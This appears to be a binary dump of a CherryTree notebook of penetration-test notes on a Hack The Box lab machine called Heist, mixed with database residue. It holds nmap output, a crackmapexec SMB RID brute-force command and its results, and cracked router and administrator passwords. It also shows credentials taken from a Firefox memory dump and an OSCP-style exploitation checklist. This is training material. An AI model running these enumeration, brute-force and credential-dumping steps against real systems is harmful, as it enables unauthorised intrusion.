SQLite format 3@ -  Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node  '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xA[V1 m'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"A?&Nk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CXk#'  Enumerationcustom-colors*A?&s.=ui' 10.11.1.custom-colors$A[Y)A[Y}xn'  !WebDavv)'  Dirb\DirBustercustom-colors$A?&xA[V1 m'  Niktocustom-colors$A?&oA?&%K'  Web ServicesGuest Login Allowed Hazard includedk'  UDPcustom-colors$A?&ЍA[?L̉r'  TCPnmap -sC -sV -oA ./heist 10.10.10.149 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-03 14:35 EDT Nmap scan rk#'  Enumerationcustom-colors*A?&s.=u n$Lk '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2l'   Othercustom-colorsA[EϯA[Tci '  DBcustom-colorsA[EA[Selk '  SNMPcustom-colorsA[DԢA[G!Bj '  SMBcustom-colorsA[PA[DNn )'  Other Servicescustom-colorsXA[Ad 33_%g'  ExploitationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Evil-WinRM with the Chase credentials from crackmapexec Exploit Code Used Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colors,AסVyv)'  Script Resultscustom-colorsXAIZ|xAIq/'  Post Exploitationcustom-colors*AIZnn #X/]'  Running ProcessesProcess Listcustom-colors$AIwq&#w'  File SystemWriteable Files\Directories Directory List custom-colors$A[3QZ-U'  Host InformationOperating System Architecture Domain Installed Updates custom-colors$A[4* OLLOO/'  Running ProcessesProcess List Firefox process memory dump "C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login= MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login= localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login= MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login= ADMIN CREDENTIALcustom-colors$Aס$D9q'   Installed ApplicationsInstalled Applicationscustom-colors$AILg BOB G'   NetworkUsers kali@kali:~/Heist$ crackmapexec smb 10.10.10.149 -u hazard -p stealth1agent --rid-brute SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SUPPORTDESK) (signing:False) (SMBv1:False) SMB 10.10.10.149 445 SUPPORTDESK [+] SUPPORTDESK\hazard:stealth1agent SMB 10.10.10.149 445 SUPPORTDESK .9q'   Installed ApplicationsInstalled Applicationscustom-colors$AILg wwo(#i0'  Passwordssecret:stealth1agent rout3r:$uperP@ssword admin:Q4)sJu\Y8qz*A3?d Above found in router configs SUPPORTDESK\hazard:stealth1agent SUPPORTDESK\Chase:Q4)sJu\Y8qz*A3?d Administrator:4dD!5}x/re8]FBuZ custom-colors$AסR /9'  Software VersionsSoftware Versions Potential Exploitscustom-colorsANlH{x/'  Proof\Fla@/'  Proof\Flags\OtherUser - a127daef77ab6d9d92008653295f59c4 Root - 50dfa3c6bfd20e2e0d071b073d766897custom-colors$AסGf'   Hashescustom-colors$A?&&ich_text>Individual Host Scanning ☐ nmap --top-ports 20 --open -iL iplist.txt ☐ nmap -sS -A -sV -O -p- ipaddress ☐ nmap -sU ipaddress Service Scanning WebAppNiktodirb ☐ dirbuster ☐ wpscan ☐ dotdotpwn ☐ view source ☐ davtest\cadevar ☐ droopscan ☐ joomscan ☐ LFI\RFI Test Linux\Windows ☐ snmpwalk -c public -v1 ipaddress 1 ☐ smbclient -L //ipaddress ☐ showmount -e ipaddress port ☐ rpcinfo ☐ Enum4Linux Anything Elsenmap scripts (locate *nse* | grep servicename) ☐ hydra ☐ MSF Aux Modules ☐ Download the softward Exploitation ☐ Gather Version Numbes ☐ Searchsploit ☐ Default Creds ☐ Creds Previously Gathered ☐ Download the software Post Exploitation Linux ☐ linux-local-enum.sh ☐ linuxprivchecker.py ☐ linux-exploit-suggestor.sh ☐ unix-privesc-check.py Windows ☐ wpc.exe ☐ windows-exploit-suggestor.py ☐ windows_privesc_check.py ☐ windows-privesc-check2.exe Priv Escalationacesss internal services (portfwd) ☐ add account Windows ☐ List of exploits Linux ☐ sudo su ☐ KernelDB ☐ Searchsploit Final ☐ Screenshot of IPConfig\WhoamI ☐ Copy proof.txt ☐ Dump hashes ☐ Dump SSH Keys ☐ Delete filescustom-colorsANl<A[ڸ., (#i' MethodologyNetwork Scanning ☐ nmap -sn 10.11.1.* ☐ nmap -sL 10.11.1.* ☐ nbtscan -r 10.11.1.0/24 ☐ smbtree custom-colorsAס-h  ' Log Bookcustom-colors(AI^ QQ^Og'  Goodiescustom-colorsVA?& c#+i'   Priv EscalationService Exploited: Vulnerability Type: Exploit POC: G'   NetworkIPConfig\IFConfig Network Processes ARP DNS Routecustom-colors$A[*܁)c'  Scheduled JobsScheduled Taskscustom-colors$ANl[+] Brute forcing RIDs SMB 10.10.10.149 445 SUPPORTDESK 500: SUPPORTDESK\Administrator (SidTypeUser) SMB 10.10.10.149 445 SUPPORTDESK 501: SUPPORTDESK\Guest (SidTypeUser) SMB 10.10.10.149 445 SUPPORTDESK 503: SUPPORTDESK\DefaultAccount (SidTypeUser) SMB 10.10.10.149 445 SUPPORTDESK 504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser) SMB 10.10.10.149 445 SUPPORTDESK 513: SUPPORTDESK\None (SidTypeGroup) SMB 10.10.10.149 445 SUPPORTDESK 1008: SUPPORTDESK\Hazard (SidTypeUser) SMB 10.10.10.149 445 SUPPORTDESK 1009: SUPPORTDESK\support (SidTypeUser) SMB 10.10.10.149 445 SUPPORTDESK 1012: SUPPORTDESK\Chase (SidTypeUser) SMB 10.10.10.149 445 SUPPORTDESK 1013: SUPPORTDESK\Jason (SidTypeUser) Found Pre-Foothold Administrator support Chase Jason Groupscustom-colors$AסisS +3'   Priv EscalationService Exploited: Firefox Vulnerability Type: Memory Dump Credential Leak Exploit POC: Description: Discovery of Vulnerability Procdump64.exe Exploit Code Used Obtained Administrator credentials from memory dump Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsAסg'  Goodiescustom-colorsVA?& c Cisco Router Config in attachment version 12.2 no service pad service password-encryption ! isdn switch-type basic-5ess ! hostname ios-1 ! security passwords min-length 12 enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91 ! username rout3r password 7 0242114B0E143F015F5D1E161713 username admin privilege 15 password 7 02375012182C1A1D751618034F36415408 ! ! ip ssh authentication-retries 5 ip ssh version 2 ! ! router bgp 100 synchronization bgp log-neighbor-changes bgp dampening network 192.168.0.0Â mask 300.255.255.0 timers bgp 3 9 redistribute connected ! ip classless ip route 0.0.0.0 0.0.0.0 192.168.0.1 ! ! access-list 101 permit ip any any dialer-list 1 protocol ip list 101 ! no ip http server no ip http secure-server ! line vty 0 4 session-timeout 600 authorization exec SSH transport input sshcustom-colors"Aס6$eport for 10.10.10.149 Host is up (0.23s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 | http-title: Support Login Page |_Requested resource was login.php 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds? Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 16s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-04-03T18:36:23 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 89.38 seconds custom-colors$A?&Aס{